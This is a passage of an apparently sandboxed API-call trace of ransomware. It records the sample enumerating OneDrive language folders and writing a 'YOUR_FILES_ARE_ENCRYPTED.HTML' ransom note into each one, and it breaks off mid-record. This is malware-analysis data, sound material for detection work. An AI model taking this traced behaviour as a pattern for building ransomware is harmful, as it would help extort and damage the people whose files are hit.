lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm" [0162.869] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*" [0162.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.870] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.870] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.870] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.870] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.870] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.870] lstrlenW (lpString=".mui") returned 4 [0162.870] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.870] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.870] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.870] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tk-tm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.871] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.873] CloseHandle (hObject=0x5ac) returned 1 [0162.873] GetProcessHeap () returned 0x270000 [0162.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.874] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tn-za", cAlternateFileName="")) returned 1 [0162.874] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za") returned 77 [0162.874] GetProcessHeap () returned 0x270000 [0162.874] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.874] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za" [0162.874] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*" [0162.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 
[0162.875] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.875] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.875] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.875] lstrlenW (lpString=".mui") returned 4 [0162.875] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.875] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.875] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tn-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.876] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.878] CloseHandle (hObject=0x5ac) returned 1 [0162.878] GetProcessHeap () returned 0x270000 [0162.879] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.879] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tr", cAlternateFileName="")) returned 1 [0162.879] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr") returned 74 [0162.879] GetProcessHeap () returned 0x270000 [0162.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.879] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr" [0162.879] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*" [0162.879] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.880] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.880] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.880] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.881] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0162.881] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.881] lstrlenW (lpString=".mui") returned 4 [0162.881] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.881] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.881] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.881] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.881] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.883] CloseHandle (hObject=0x5ac) returned 1 [0162.884] GetProcessHeap () returned 0x270000 [0162.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.885] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tt", cAlternateFileName="")) returned 1 [0162.885] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt") returned 74 [0162.885] GetProcessHeap () returned 0x270000 [0162.885] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.885] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt" [0162.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*" [0162.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.885] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.885] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.885] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.885] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.886] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.886] lstrlenW (lpString=".mui") returned 4 [0162.886] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.886] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac36b850, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.886] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.886] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.886] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.890] CloseHandle (hObject=0x5ac) returned 1 [0162.890] GetProcessHeap () returned 0x270000 [0162.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.891] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="ug", cAlternateFileName="")) returned 1 [0162.891] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug") returned 74 [0162.891] GetProcessHeap () returned 0x270000 [0162.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.891] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug" [0162.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*" [0162.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.892] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, 
